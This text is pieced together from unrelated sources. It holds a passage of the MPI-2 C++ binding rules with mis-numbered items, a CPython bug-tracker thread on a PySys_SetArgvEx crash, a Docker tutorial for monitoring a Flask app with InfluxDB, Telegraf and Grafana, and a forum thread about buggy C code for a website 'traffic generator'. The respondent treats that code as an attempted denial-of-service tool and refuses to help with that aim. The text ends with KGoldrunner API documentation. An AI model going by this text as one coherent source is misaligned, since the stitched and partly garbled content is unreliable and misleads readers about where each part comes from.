Definition at line 852 of file kgoldrunner.cpp.
Definition at line 835 of file kgoldrunner.cpp.
This function is called when it is time for the app to save its properties for session management purposes.
Definition at line 843 of file kgoldrunner.cpp.
Definition at line 779 of file kgoldrunner.cpp.
Definition at line 774 of file kgoldrunner.cpp.
Used to indicate if the class initialised properly.
Definition at line 58 of file kgoldrunner.h.
The documentation for this class was generated from the following files:
Documentation copyright © 1996-2020 The KDE developers.
Generated on Sat May 9 2020 04:10:01 by doxygen 1.8.7 written by Dimitri van Heesch, © 1997-2006
KDE's Doxygen guidelines are available online. | https://api.kde.org/4.x-api/kdegames-apidocs/kgoldrunner/html/classKGoldrunner.html | CC-MAIN-2020-29 | refinedweb | 242 | 53.58 |
Hey guys, so my assignment is making a program that takes 2 measure objects and multiplies them together and displays them in square feet.
What I'm trying to do is convert the feet into inches for both of the measure objects, then multiply the added inches together. Then I'm trying to reconvert the inches back to feet and inches so the output displays square feet and square inches. Problem is that's where I need guidance... If anybody knows of an easier method, I'm up for suggestions, but it has to remain as classes and functions though, that's what my professor wants.
These are the errors I get:
1: error C2664: 'Measure::Measure(const Measure &)' : cannot convert parameter 1 from 'int' to 'const Measure &' c:\users\michael\desktop\class folders\cs 1410\c ++ programs\measure\measure\measure.cpp 35 1 Measure
2: IntelliSense: no suitable constructor exists to convert from "int" to "Measure" c:\users\michael\desktop\class folders\cs 1410\c ++ programs\measure\measure\measure.cpp 35 9 Measure
#include <iostream> using namespace std; class Measure { private: int feet; int inches; public: Measure(); Measure (int f, int i) : feet(f), inches(i) { } Measure convert(int i);); return (a1 * a2); } Measure Measure::convert(int i) { Measure temp; temp.inches = i / 144; temp.feet = i %= 144; return temp; } Measure read() { int feet; int inches; cout << "Enter the length's feet: "; cin >> feet; cout << "Enter the length's inches: "; cin >> inches; return Measure(feet, inches); } | https://www.daniweb.com/programming/software-development/threads/321210/measuring-program-with-classes-and-functions | CC-MAIN-2017-26 | refinedweb | 247 | 50.16 |
You can subscribe to this list here.
Showing
2
results of 2
Part 2:
Since my site also has top level directories such as Graphics/ JavaScript/
etc. as well as a StyleSheet.css in the main directory, I need a convenient
way to refer to these from subdirectories.
I do this by prepending a string I call the "root dir" to my relative links:
def rootDir(self):
'''
Returns the root directory of the site appropriate for prepending to
relative paths, such as Graphics/foo.gif. Will return '', '../', '../../', etc.
'''
parts = self.request().urlPath().split('/')
numExtraParts = len(parts) - parts.index('MyContext') - 2
return '../' * numExtraParts
So I might have a link that looks like this:
'%sStyleSheet.css' % self.rootDir()
My host name, WebKit adapter name and context name can change at any time
and the existing code will work fine since I use ../
Upon deployment to the production environment, I could leave this as is, or
change rootDir() to return '';.
| http://sourceforge.net/p/webware/mailman/webware-discuss/?viewmonth=200103&viewday=25 | CC-MAIN-2014-23 | refinedweb | 157 | 65.22 |
#include <CCScrollView.h>
override functions
Reimplemented from CCLayer.
Reimplemented in CCTableView.
Returns an autoreleased scroll view object.
Returns an autoreleased scroll view object.
Returns the untransformed size of the node.
Reimplemented from CCNode.
direction allowed to scroll.
CCScrollViewDirectionBoth by default..
If isTouchEnabled, this method is called onEnter.
Override it to change the way CCLayer receives touch events. ( Default: CCTouchDispatcher::sharedDispatcher()->addStandardDelegate(this,0); ) Example: void CCLayer::registerWithTouchDispatcher() { CCTouchDispatcher::sharedDispatcher()->addTargetedDelegate(this,INT_MIN+1,true); }
Reimplemented from CCLayer..
Determines whether the scroll view is allowed to bounce or not.
If YES, the view is being dragged.
Determiens whether user touch is moved after begin phase.
max inset point to limit scrolling by touch
max zoom scale
min inset point to limit scrolling by touch
max and min scale
min zoom scale
length between two fingers
current zoom scale
Container holds scroll view contents, Sets the scrollable container object of the scroll view.
scroll view delegate
UITouch objects to detect multitouch.
Content offset.
Note that left-bottom point is the origin
scissor rect for parent, just for restoring GL_SCISSOR_BOX
scroll speed
Touch point. | http://www.cocos2d-x.org/reference/native-cpp/V2.2.1/d3/dbc/classcocos2d_1_1extension_1_1_c_c_scroll_view.html | CC-MAIN-2018-26 | refinedweb | 181 | 52.97 |
A friendly place for programming greenhorns!
Big Moose Saloon
Search
|
Java FAQ
|
Recent Topics
|
Flagged Topics
|
Hot Topics
|
Zero Replies
Register / Login
JavaRanch
»
Java Forums
»
Java
»
Beginning Java
Author
Date format reversing
JeffreyAaron Smith
Greenhorn
Joined: Jan 26, 2013
Posts: 4
posted
Feb 23, 2013 17:27:53
0
I've been working on a pair of programs (driver and driven) that will accept input in the form of numbers a slash mark and numbers, which represent the month and day. The program error checks the input for valid numbers and then prints a line with the numbers as entered (mm/dd) and with the month spelled out (Month dd). Unfortunately, my code is somehow reversing the value for the date (i.e. 02/05=May 2).
I'm sure this is something simple I'm overlooking, but I've been scouring this code all day and can't find it. Any help would be greatly appreciated.
The driver:
import java.util.Scanner; public class SmithJeffreyDateDriver { public static void main(String args[]) { Scanner stdIn = new Scanner(System.in); String error = null; String dateStr = null; boolean repeat = true; while (repeat) { System.out.print("Enter a date in the form mm/dd ('q' to quit): "); dateStr = stdIn.nextLine(); if (dateStr != null) { if (!dateStr.equalsIgnoreCase("q")) { Date d = new Date(dateStr); error = d.getError(); if (error == null) { d.monthDayNumbers(); d.monthLtrsDayNbrs(); System.out.println(""); } else System.out.println(error); } else repeat = false; } else System.out.println("You must enter something."); } } } // End of class SmithJeffreyDateDriver
And the driven class:
public class Date { private int month = -1; private int day = -1; private int[] monthLength = {31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31}; private String[] monthFull = {"January", "February", "March", "April", "May", "June", "July", "August", "September", "October", "November", "December"}; private String error = null; private String errorMessage = null; // Date constructor with error checking public Date(String dateStr) { int mth1 = 0; int mth2 = 0; int day1 = 0; int day2 = 0; int dateLength = 0; // Creates error message if dateStr is less than minimum length if (dateStr.length() < 3) errorMessage = "1Invalid date format - " + dateStr; else try { dateLength = dateStr.length(); errorMessage = "2Invalid date format - " + dateStr; int spot = dateStr.indexOf("/"); if (spot < 0) throw new Exception(error); errorMessage = "4Invalid format - " + dateStr; if (spot+2 <= dateLength) mth2 = Integer.valueOf(dateStr.substring(spot+1, spot+2)); else throw new Exception(errorMessage); try { if (spot+3 <= dateLength) { mth1 = Integer.valueOf(dateStr.substring(spot+2, spot+3)); month = mth2 * 10 + mth1; } } finally { if (mth2 < 1) month = mth1; } if ((month < 1) || (month > 12)) throw new Exception(error); errorMessage = "6Invalid month - " + dateStr; if (spot > 0) day2 = Integer.valueOf(dateStr.substring(spot-1, spot)); try { if (spot > 1) { day1 = Integer.valueOf(dateStr.substring(spot-2, spot-1)); day = day1 * 10 + day2; } } finally { if (day1 < 1) day = day2; } if ((day < 1) || (day > 31)) throw new Exception(error); errorMessage = "8Invalid day - " + dateStr; int days = monthLength[month-1]; errorMessage = "9Invalid day - " + dateStr; if (day > days) throw new Exception(error); } catch (Exception e) { error = errorMessage + "\n"+e.getMessage()+"\n"; } } // Print method to print month-day all in numbers public void monthDayNumbers() { System.out.printf("%02d/%02d\n", month, day); } // Print method to print in month-day with month spelled out and numbers public void 
monthLtrsDayNbrs() { System.out.println(monthFull[month-1]+" "+String.valueOf(day)); } // getError method that returns error value after all error checking is done public String getError() { return error; } } // End of class Date
Bear Bibeault
Author and ninkuma
Marshal
Joined: Jan 10, 2002
Posts: 63529
72
I like...
posted
Feb 23, 2013 18:20:54
0
First of all, it's not the best idea to name your own classes the same as
Java
classes. Leave "Date" alone.
And, why are you writing all this code when the
DateFormat
and Calendar classes already have it all solved for you?
[
Asking smart questions
] [
About Bear
] [
Books by Bear
]
JeffreyAaron Smith
Greenhorn
Joined: Jan 26, 2013
Posts: 4
posted
Feb 23, 2013 19:00:24
0
Because this is a project for a class with very specific requirements. For instance the driven class portion of the program must be named, "Date.java" and the driver named "LastnameFirstnameDateDriver.java". It also must include a Date constructor that receives a
string
called dateStr. It must error check the input using try/catch.
Unfortunately now I've been error checking, rewriting, adding, deleting for so long now, I'm not sure where I'm at...looking over the code, I suspect I have complicated it more than it needs to be.
I'm sorry to be asking, but can you help look through my code and streamline/debug?
Rene Larsen
Ranch Hand
Joined: Oct 12, 2001
Posts: 1179
I like...
posted
Feb 25, 2013 04:15:50
0
You expect the input format to be mm/dd - but this is not what you expect in your Date code.
You start with finding the date delimiter '/', then you try to find the month, but is is the day you select (spot + 2) - and then you try to find the day, but also here you select the wrong one, you select the month (spot -1)
Regards, Rene Larsen
Dropbox Invite
I agree. Here's the link:
subject: Date format reversing
Similar Threads
help with Progamme
Custom Date class and Appointment class
BigDecimal to Date Conversion
Subtract 2 Dates
cannot find symbol inside String?
All times are in JavaRanch time: GMT-6 in summer, GMT-7 in winter
JForum
|
Paul Wheaton | http://www.coderanch.com/t/605693/java/java/Date-format-reversing | CC-MAIN-2015-40 | refinedweb | 905 | 61.16 |
Python in the context of CMotion
On 25/08/2018 at 07:45, xxxxxxxx wrote:
I'm digging around some areas of c4d which I've neglected for a while, today its the CMotion object.
Does anyone know of any examples or use cases for python in the context of CMotion actions? Does it have some predefined parameters/variables? in the help file it just says
"You can write, copy, paste, etc.. your Python scripts in this input field. They will be executed automatically by CMotion once the animation is run."
So I assume there must be some method of addressing relevant / relative cmotion properties?
On 27/08/2018 at 09:01, xxxxxxxx wrote:
Hi Nnenov,
Regarding your question, you have to define a function called Action.
Then there is some globals variable available.
doc: BaseDocument - The document of the current Cmotion Object.
op: BaseList2D - The object affected by this python Cmotion action.
time: float - The time in the current document.
cycle: float - Count of cycle already occurs (for example if the Cmotion Time is set to 30F, it's basically int(CurrentFrame)/int(30))
pos: float - Current time position in the cycle (from 0.0 to 1.0)
phase: float - Current value of the phase.
weight: float - The weight of the python Cmotion action.
Here a basic example about how to move an object in the X direction.
import c4d def Action() : maxXValue = 100 * weight op.SetRelPos(c4d.Vector(maxXValue,0 ,0) * pos)
If you have any question please let me know!
Cheers,
Maxime.
On 27/08/2018 at 19:44, xxxxxxxx wrote:
Hi Maxime,
Thanks, this is great!
I was wondering, is there a way to get other objects in the list, for example if op is the object affected by the action, is there a way to relatively (or absolutely) reference another object in the CMotion object manager?
e.g. I tried op.GetNext() but it doesn't seem to work
Thanks again!
Nick
On 28/08/2018 at 03:22, xxxxxxxx wrote:
Hi,
I'm afraid it's not possible, op is just a link to the actual object within the scene.
And there is no way to find the corresponding Cmotion Object, and even if you get the Cmotion Object, CMotion[c4d.ID_CA_WCYCLE_TAG_OBJECTS] is currently not exposed in python and you can't iterate the tree.
Cheers,
Maxime.
On 28/08/2018 at 19:42, xxxxxxxx wrote:
Aw well, I'm not sure what I want to do yet anyway. If I wanted I can just reference the parameters being affected directly from the objects in my scene, I think. need to play with it more
Thanks! | https://plugincafe.maxon.net/topic/10930/14387_python-in-the-context-of-cmotion | CC-MAIN-2020-05 | refinedweb | 442 | 74.29 |
Subject: Re: [boost] Boost.Process article: Tutorial and request for comments
From: vicente.botet (vicente.botet_at_[hidden])
Date: 2009-04-21 17:21:14
Hi,
Excellent idea to write this article.
I have not used the library nor read the documentation deeply.
I have, however, some suggestions about the library design.
I don't see the need to separate into several platform-specific classes.
A program using the Process library will run on only one platform at a time, so classes such as process and child could conditionally include the platform-specific features. The current design has the advantage of making the non-portable parts explicit, but how do you provide features common to two platforms that are not available on a third one? In addition, the risk of making platform-specific classes is that the underlying concepts end up too close to the concrete features provided by one platform. I would prefer to have a specific define for each non-portable feature.
I would organize the platform-specific classes in per-platform namespaces:
common for the portable part
namespace process {
namespace common {
class process;
class child;
}
}
posix for the POSIX-based OSes
#ifdef BOOST_PLATFORM_POSIX // or something like that
namespace process {
namespace posix {
class process : public common::process{...};
class child: public common::child{...};
}
}
#endif
windows for the Microsoft-OS-based platforms
#ifdef BOOST_PLATFORM_WINDOWS // or something like that
namespace process {
namespace windows {
class process : public common::process{...};
class child: public common::child{...};
}
}
#endif
// other platforms
and have a typedef or a using declaration at the process namespace level for each of the available classes, as in:
namespace process {
#if defined(__POSIX__) // or something like
typedef posix::process process;
// or using posix::process;
#elif defined() // other platforms
...
#else
typedef common::process process;
// or using common::process;
#endif
}
When the user uses a non-portable feature in a portable program, they will need to check conditionally for the non-portable feature, as in:
#ifdef BOOST_PROCESS_HAS_SPECIFC_FEATURE_1
// ...
#else
// ...
#endif
Your proposal about iterating over all the processes running on a machine is a must-have.
The issue with respect to the environment map could be abstracted by defining a specific class that manages the synchronization between the settings and the collection.
Even if the following could be done in a higher-level library (Shell), I would like to think of the context concept as a shell which can be nested, with a stack of shells. This stack can be stored in a thread-specific context, so when a new process is created it will inherit from the current context.
In the shell context, a command concept could find its place. For example,
shell::cd("/tmp");
will change the current directory to "/tmp" in the top context of the stack.
If the command fails it can be recovered
Commands could be composed using pipe "|",
shell::cat("/tmp.file.txt") | shell::wc();
redirection ">"
shell::cat("/tmp.file.txt") | shell::wc() > str;
tee
shell::cat("/tmp.file.txt") | shell::grep () | shell::tee("file");
conditional concatenation "&",
shell::cd("/tmp") & shell::ls();
which executes ls only if cd /tmp succeeds.
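For illustration only, the composition idea can be mimicked with plain functors. This is a toy sketch, not Boost.Process API; Command, make_source and word_count are names invented here:

```cpp
#include <cassert>
#include <functional>
#include <sstream>
#include <string>

// Toy model of shell-style composition: a Command maps input text to
// output text, and operator| chains two Commands like a pipeline.
struct Command {
    std::function<std::string(const std::string&)> run;
};

Command operator|(const Command& a, const Command& b) {
    return Command{[a, b](const std::string& in) { return b.run(a.run(in)); }};
}

// Stand-in for `cat file`: emits fixed text.
Command make_source(const std::string& text) {
    return Command{[text](const std::string&) { return text; }};
}

// Stand-in for `wc -w`: counts whitespace-separated words.
Command word_count() {
    return Command{[](const std::string& in) {
        std::istringstream ss(in);
        std::string w;
        int n = 0;
        while (ss >> w) ++n;
        return std::to_string(n);
    }};
}
```

A real implementation would connect actual child-process stdin/stdout, but the operator overloads could look much the same.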
Portability is not only related to platform features, but also to the features provided by specific programs. I would like to see an example of how the user would write portable code when he wants to execute a program that has different syntax on different platforms but provides the same feature, e.g. the equivalent of "ping" on Solaris is "ping -c 1" on Linux.
Lastly, some minor questions:
What about renaming handle to native_handle?
What is wrong with using the Boost.Filesystem library to identify executables?
Why do we need to duplicate the name of the executable as an argument?
With respect to relative or absolute paths of executables, why not let the underlying platform handle this?
HTH,
Vicente
----- Original Message -----
From: "Boris Schaeling" <boris_at_[hidden]>
To: <boost_at_[hidden]>
Cc: <boost-users_at_[hidden]>
Sent: Tuesday, April 21, 2009 2:01 PM
Subject: [boost] Boost.Process article: Tutorial and request for comments
Boost list run by bdawes at acm.org, gregod at cs.rpi.edu, cpdaniel at pacbell.net, john at johnmaddock.co.uk
Ruby Array Exercises: Check whether a given array contains a 3 next to a 3 or a 5 next to a 5, but not both
Ruby Array: Exercise-38 with Solution
Write a Ruby program to check whether a given array contains a 3 next to a 3 or a 5 next to a 5, but not both.
Ruby Code:
def check_array(nums)
  no3pair = 1
  no5pair = 1
  i = 0
  while i < nums.length && (no3pair + no5pair != 0)
    if (nums[i] == 3 && nums[i + 1] == 3)
      no3pair = 0
    elsif (nums[i] == 5 && nums[i + 1] == 5)
      no5pair = 0
    end
    i = i + 1
  end
  return ((no3pair ^ no5pair) == 1)
end

print check_array([3, 3, 7, 5]), "\n"
print check_array([3, 8, 5, 9]), "\n"
print check_array([3, 7, 5, 5]), "\n"
Output:
true
false
true
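For comparison, the same check can be written with Enumerable#each_cons, which yields adjacent pairs directly. This is an alternative sketch, not part of the exercise; check_array_pairs is a name invented here:

```ruby
# Alternative sketch: scan adjacent pairs with each_cons(2), then XOR the
# two findings so the result is true only when exactly one kind of pair exists.
def check_array_pairs(nums)
  has33 = nums.each_cons(2).any? { |a, b| a == 3 && b == 3 }
  has55 = nums.each_cons(2).any? { |a, b| a == 5 && b == 5 }
  has33 ^ has55
end

print check_array_pairs([3, 3, 7, 5]), "\n"
print check_array_pairs([3, 8, 5, 9]), "\n"
print check_array_pairs([3, 7, 5, 5]), "\n"
```

This avoids the manual index bookkeeping, at the cost of scanning the pairs twice.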
yamlesque
Pure Scala YAML parsing.
As the name suggests, "yaml-esque" is a Scala implementation of the most frequently used YAML features. It takes inspiration from Li Haoyi's ujson library and aims to provide an idiomatic API that is cross-platform and has no dependencies.
Getting Started
Include yamlesque into a project.
mill:
ivy"io.crashbox::yamlesque::<latest_tag>"
sbt:
"io.crashbox" %%% "yamlesque" % "<latest_tag>"
Yamlesque is available for Scala 3 and 2.13, including ScalaJS and Native.
It should also work with Scala 2.12, 2.11, 2.10 and 2.9, although no pre-compiled libraries are published for these versions.
👉 Online Converter 👈
Built with ScalaJS, this online converter allows you to transform YAML to JSON as you type.
Read Some YAML
val text = s"""|name: yamlesque
               |description: a YAML library for scala
               |authors:
               |  - name: Jakob Odersky
               |    id: jodersky
               |""".stripMargin

val yaml: yamlesque.Value = yamlesque.read(text)
val id = yaml.obj("authors").arr(0).obj("id").str

println(id) // == "jodersky"
Write Some YAML
import yamlesque as y

val config = y.Obj(
  "auth" -> y.Obj(
    "username" -> y.Str("admin"),
    "password" -> y.Str("guest")
  ),
  "interfaces" -> y.Arr(
    y.Obj(
      "address" -> y.Str("0.0.0.0"),
      "port" -> y.Str("80")
    ),
    y.Obj(
      "address" -> y.Str("0.0.0.0"),
      "port" -> y.Str("443")
    )
  )
)

val stringly = config.render()
println(stringly)
will result in
auth:
  username: admin
  password: guest
interfaces:
  - address: 0.0.0.0
    port: 80
  - address: 0.0.0.0
    port: 443
Official YAML Conformance
Yamlesque does not strictly implement all features as defined in YAML 1.2; however, support should be sufficient for most regular documents.
A major point of divergence between official YAML and this library is the way in which typing of strings is done. Whereas official YAML implicitly casts strings to narrower types when possible (for example the string "2" is treated as the number 2), this library always treats strings as text. This approach leads to a more uniform parsing system which avoids many subtle bugs, including the infamous Norway Problem. In your application of course, you are still free to attempt to read strings as different types. Just the parser won't do this for you.
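The Norway Problem mentioned above is exactly this kind of bug: under YAML 1.1-style implicit typing, an unquoted no is read as boolean false by many loaders, while a text-only parser keeps it as the string "no". A hypothetical document showing the hazard:

```yaml
countries:
  - gb
  - ie
  - no   # implicitly typed loaders read this as boolean false, not "no"
```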
Available features:
- strings: plain (i.e. scalars) and double quoted
- block-style strings (| and >)
- lists and maps
Features which are currently not supported but for which support is planned:
- multiple documents (i.e. ---)
- single quoted strings
Unsupported features with no planned implementation:
- anchors and references
- flow-styles (aka inline JSON)
- chomping modifiers (e.g. the '-' in '>-')
Pull requests with additional feature implementations are always welcome!
Geny-Compatible
The core type yamlesque.Value is a geny.Writable. This means that it will work "out-of-the-box" with many other libraries from the "Singaporean Stack". Some examples:
Read YAML from a file, using the os-lib library:
yamlesque.read(os.read.stream(os.pwd / "config.yaml"))
Send it as part of an HTTP request, using the scala-requests library:
val yaml: yamlesque.Value = ...
requests.post(
  "https://....",
  body = yaml
)
Send it as part of an HTTP response, using the cask framework.
This document is focused on using
data.table as a dependency in other R packages. If you are interested in using
data.table C code from a non-R application, or in calling its C functions directly, jump to the last section of this vignette.
Importing
data.table is no different from importing other R packages. This vignette is meant to answer the most common questions arising around that subject; the lessons presented here can be applied to other R packages.
data.table
One of the biggest features of
data.table is its concise syntax which makes exploratory analysis faster and easier to write and perceive; this convenience can drive packages authors to use
data.table in their own packages. Another maybe even more important reason is high performance. When outsourcing heavy computing tasks from your package to
data.table, you usually get top performance without needing to re-invent any of these numerical optimization tricks on your own.
Importing data.table is easy
It is very easy to use
data.table as a dependency due to the fact that
data.table does not have any of its own dependencies. This statement is valid for both operating system dependencies and R dependencies. It means that if you have R installed on your machine, it already has everything needed to install
data.table. This also means that adding
data.table as a dependency of your package will not result in a chain of other recursive dependencies to install, making it very convenient for offline installation.
DESCRIPTION file
The first place to define a dependency in a package is the
DESCRIPTION file. Most commonly, you will need to add
data.table under the
Imports: field. Doing so will necessitate an installation of
data.table before your package can compile/install. As mentioned above, no other packages will be installed because
data.table does not have any dependencies of its own. You can also specify the minimal required version of a dependency; for example, if your package is using the
fwrite function, which was introduced in
data.table in version 1.9.8, you should incorporate this as
Imports: data.table (>= 1.9.8). This way you can ensure that the version of
data.table installed is 1.9.8 or later before your users will be able to install your package. Besides the
Imports: field, you can also use
Depends: data.table but we strongly discourage this approach (and may disallow it in future) because this loads
data.table into your user’s workspace; i.e. it enables
data.table functionality in your user’s scripts without them requesting that.
Imports: is the proper way to use
data.table within your package without inflicting
data.table on your user. In fact, we hope the
Depends: field is eventually deprecated in R since this is true for all packages.
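Putting the above together, the dependency part of a DESCRIPTION file might look like this (the package name and version are placeholders):

```text
Package: a.pkg
Version: 0.0.1
Imports: data.table (>= 1.9.8)
```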
NAMESPACE file
The next thing is to define what content of
data.table your package is using. This needs to be done in the
NAMESPACE file. Most commonly, package authors will want to use
import(data.table) which will import all exported (i.e., listed in
data.table’s own
NAMESPACE file) functions from
data.table.
You may also want to use just a subset of
data.table functions; for example, some packages may simply make use of
data.table’s high-performance CSV reader and writer, for which you can add
importFrom(data.table, fread, fwrite) in your
NAMESPACE file. It is also possible to import all functions from a package excluding particular ones using
import(data.table, except=c(fread, fwrite)).
Be sure to read also the note about non-standard evaluation in
data.table in the section on “undefined globals”
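For reference, a minimal NAMESPACE using the greedy import might look like this (the export line is a placeholder for whatever functions your package actually provides):

```text
import(data.table)
export(my_fun)
```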
As an example we will define two functions in
a.pkg package that uses
data.table. One function,
gen, will generate a simple
data.table; another,
aggr, will do a simple aggregation of it.
Be sure to include tests in your package. Before each major release of
data.table, we check reverse dependencies. This means that if any changes in
data.table would break your code, we will be able to spot breaking changes and inform you before releasing the new version. This of course assumes you will publish your package to CRAN or Bioconductor. The most basic test can be a plaintext R script in your package directory
tests/test.R:
When testing your package, you may want to use
R CMD check --no-stop-on-test-error, which will continue after an error and run all your tests (as opposed to stopping on the first line of script that failed); NB this requires R 3.4.0 or greater.
testthat
It is very common to use the
testthat package for the purpose of testing. Testing a package that imports
data.table is no different from testing other packages. An example test script
tests/testthat/test-pkg.R:
context("pkg tests")
test_that("generate dt", {
  expect_true(nrow(gen()) == 100)
})
test_that("aggregate dt", {
  expect_true(nrow(aggr(gen())) < 100)
})
If
data.table is in Suggests (but not Imports) then you need to declare
.datatable.aware=TRUE in one of the R/* files to avoid “object not found” errors when testing via
testthat::test_package or
testthat::test_check.
data.table’s use of R’s deferred evaluation (especially on the left-hand side of :=) is not well-recognised by R CMD check. This results in NOTEs like the following during package check:
* checking R code for possible problems ... NOTE
aggr: no visible binding for global variable 'grp'
gen: no visible binding for global variable 'grp'
gen: no visible binding for global variable 'id'
Undefined global functions or variables:
  grp id
The easiest way to deal with this is to pre-define those variables within your package and set them to
NULL, optionally adding a comment (as is done in the refined version of
gen below). When possible, you could also use a character vector instead of symbols (as in
aggr below):
gen = function (n = 100L) {
  id = grp = NULL # due to NSE notes in R CMD check
  dt = as.data.table(list(id = seq_len(n)))
  dt[, grp := ((id - 1) %% 26) + 1
     ][, grp := letters[grp]
     ][]
}
aggr = function (x) {
  stopifnot(
    is.data.table(x),
    "grp" %in% names(x)
  )
  x[, .N, by = "grp"]
}
The case for data.table’s special symbols (.SD, .BY, .N, .I, .GRP, .NGRP, and .EACHI; see ?.N) and the assignment operator (:=) is slightly different. You should import whichever of these values you use from data.table’s namespace, to protect against any issues arising from the unlikely scenario that we change the exported value of these in the future. E.g., if you want to use .N, .I, and :=, a minimal NAMESPACE would have:

importFrom(data.table, .N, .I, ':=')
Much simpler is to just use
import(data.table) which will greedily allow usage in your package’s code of any object exported from
data.table.
If you don’t mind having
id and
grp registered as variables globally in your package namespace you can use
?globalVariables. Be aware that these notes do not have any impact on the code or its functionality; if you are not going to publish your package, you may simply choose to ignore them.
Common practice by R packages is to provide customization options set by
options(name=val) and fetched using
getOption("name", default). Function arguments often specify a call to
getOption() so that the user knows (from
?fun or
args(fun)) the name of the option controlling the default for that parameter; e.g.
fun(..., verbose=getOption("datatable.verbose", FALSE)). All
data.table options start with
datatable. so as to not conflict with options in other packages. A user simply calls
options(datatable.verbose=TRUE) to turn on verbosity. This affects all calls to
fun() other than the ones which have been provided
verbose= explicitly; e.g.
fun(..., verbose=FALSE).
The option mechanism in R is global. Meaning that if a user sets a
data.table option for their own use, that setting also affects code inside any package that is using
data.table too. For an option like
datatable.verbose, this is exactly the desired behavior since the desire is to trace and log all
data.table operations from wherever they originate; turning on verbosity does not affect the results. Another unique-to-R and excellent-for-production option is R’s
options(warn=2) which turns all warnings into errors. Again, the desire is to affect any warning in any package so as to not miss any warnings in production. There are 6
datatable.print.* options and 3 optimization options which do not affect the result of operations. However, there is one
data.table option that does and is now a concern:
datatable.nomatch. This option changes the default join from outer to inner. [Aside: the default join is outer because outer is safer; it doesn’t drop missing data silently; moreover, it is consistent with the base R way of matching by names and indices.] Some users prefer inner join to be the default and we provided this option for them. However, a user setting this option can unintentionally change the behavior of joins inside packages that use
data.table. Accordingly, in v1.12.4 (Oct 2019) a message was printed when the
datatable.nomatch option was used, and from v1.14.2 it is now ignored with warning. It was the only
data.table option with this concern.
If you face any problems in creating a package that uses data.table, please confirm that the problem is reproducible in a clean R session using the R console:
R CMD check package.name.
Some of the most common issues developers are facing are usually related to helper tools that are meant to automate some package development tasks, for example, using
roxygen to generate your
NAMESPACE file from metadata in the R code files. Others are related to helpers that build and check the package. Unfortunately, these helpers sometimes have unintended/hidden side effects which can obscure the source of your troubles. As such, be sure to double check using R console (run R on the command line) and ensure the import is defined in the
DESCRIPTION and
NAMESPACE files following the instructions above.
If you are not able to reproduce problems you have using the plain R console build and check, you may try to get some support based on past issues we’ve encountered with
data.table interacting with helper tools: devtools#192 or devtools#1472.
Since version 1.10.5
data.table is licensed as Mozilla Public License (MPL). The reasons for the change from GPL should be read in full here and you can read more about MPL on Wikipedia here and here.
Optionally import data.table: Suggests
If you want to use
data.table conditionally, i.e., only when it is installed, you should use
Suggests: data.table in your
DESCRIPTION file instead of using
Imports: data.table. By default this definition will not force installation of
data.table when installing your package. This also requires you to conditionally use
data.table in your package code which should be done using the
?requireNamespace function. The below example demonstrates conditional use of
data.table’s fast CSV writer
?fwrite. If the
data.table package is not installed, the much-slower base R
?write.table function is used instead.
my.write = function (x) {
  if (requireNamespace("data.table", quietly=TRUE)) {
    data.table::fwrite(x, "data.csv")
  } else {
    write.table(x, "data.csv")
  }
}
A slightly more extended version of this would also ensure that the installed version of
data.table is recent enough to have the
fwrite function available:
my.write = function (x) {
  if (requireNamespace("data.table", quietly=TRUE) &&
      utils::packageVersion("data.table") >= "1.9.8") {
    data.table::fwrite(x, "data.csv")
  } else {
    write.table(x, "data.csv")
  }
}
When using a package as a suggested dependency, you should not
import it in the
NAMESPACE file. Just mention it in the
DESCRIPTION file. When using
data.table functions in package code (R/* files) you need to use the
data.table:: prefix because none of them are imported. When using
data.table in package tests (e.g. tests/testthat/test* files), you need to declare
.datatable.aware=TRUE in one of the R/* files.
data.table in Imports but nothing imported
Some users (e.g.) may prefer to eschew using
importFrom or
import in their
NAMESPACE file and instead use
data.table:: qualification on all internal code (of course keeping
data.table under their
Imports: in
DESCRIPTION).
In this case, the un-exported function
[.data.table will revert to calling
[.data.frame as a safeguard since
data.table has no way of knowing that the parent package is aware it’s attempting to make calls against the syntax of
data.table’s query API (which could lead to unexpected behavior as the structure of calls to
[.data.frame and
[.data.table fundamentally differ, e.g. the latter has many more arguments).
If this is anyway your preferred approach to package development, please define
.datatable.aware = TRUE anywhere in your R source code (no need to export). This tells
data.table that you as a package developer have designed your code to intentionally rely on
data.table functionality even though it may not be obvious from inspecting your
NAMESPACE file.
data.table determines on the fly whether the calling function is aware it’s tapping into
data.table with the internal
cedta function (Calling Environment is Data Table Aware), which, beyond checking the
?getNamespaceImports for your package, also checks the existence of this variable (among other things).
For more canonical documentation on defining package dependencies, check the official manual: Writing R Extensions.
Some of the internally used C routines are now exported at the C level and thus can be used in R packages directly from their C code. See
?cdt for details, and the section "Linking to native routines in other packages" of Writing R Extensions for usage.
Some tiny parts of
data.table C code were isolated from the R C API and can now be used from non-R applications by linking to .so / .dll files. More concrete details about this will be provided later; for now you can study the C code that was isolated from the R C API in src/fread.c and src/fwrite.c.
Yeah, but the main problem is that the internet is a powerful source of knowledge. I can find almost everything that I want and need, sure. But how can a beginner separate garbage from diamonds? One website, for example, says to always use using namespace std;
instead of using std::cout; using std::cin; which I prefer. Which one is correct?
I know that I can learn from the web, but I don't want to lose my time re-learning things that were not correct.
The ones that use the using-directive (e.g., "using namespace std;") instead of a using-declaration (e.g., "using std::cout;") might come from a legacy codebase (ported from C, pre-standard C++ before 1998, etc.). Generally, this is not a good practice due to namespace pollution.
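The practical difference can be sketched in a few lines (shout is an invented example function): a using-declaration imports exactly one name into the current scope, so the rest of std cannot collide with your own identifiers.

```cpp
#include <cassert>
#include <string>

// using-declaration: only std::string is imported into this scope.
// A using-directive (using namespace std;) would import every name in
// std, which is the "namespace pollution" warned about above.
using std::string;

string shout(const string& s) {
    return s + "!";
}
```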
The 'bean' keyword acts like the 'enum' keyword. It causes the generated class to implement a JDK interface, Bean. Since bean and property would be contextual keywords, they could be incorporated without fear of breaking existing code. The compiler, upon finding 'bean', would construct a new class where the properties would be publicly accessible. These new keywords are based on the Java Bean 1.0 specification. Stephen goes on in his blog to suggest a better syntax that would break (or require an update to) this specification. He suggests that maybe it would be better if the generated code looked like:
public class Person implements Bean {
    // public final properties
    public final Property forename = ...
    public final Property surname = ...
}

To access a property, one would have to use something like aPerson.forename.get(). In the conclusion to this blog entry, Stephen remarks that this type of change is unlikely. However, the blog entry does bring up an interesting question: can we effectively change property support in Java without touching the Java Bean specification?
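For contrast, this is roughly the hand-written boilerplate such a keyword would generate for you today; a hypothetical sketch in conventional JavaBeans style, not code from the blog:

```java
// Conventional JavaBeans boilerplate for two properties. A 'bean' keyword
// would let the compiler generate the fields and accessors automatically.
class Person {
    private String forename;
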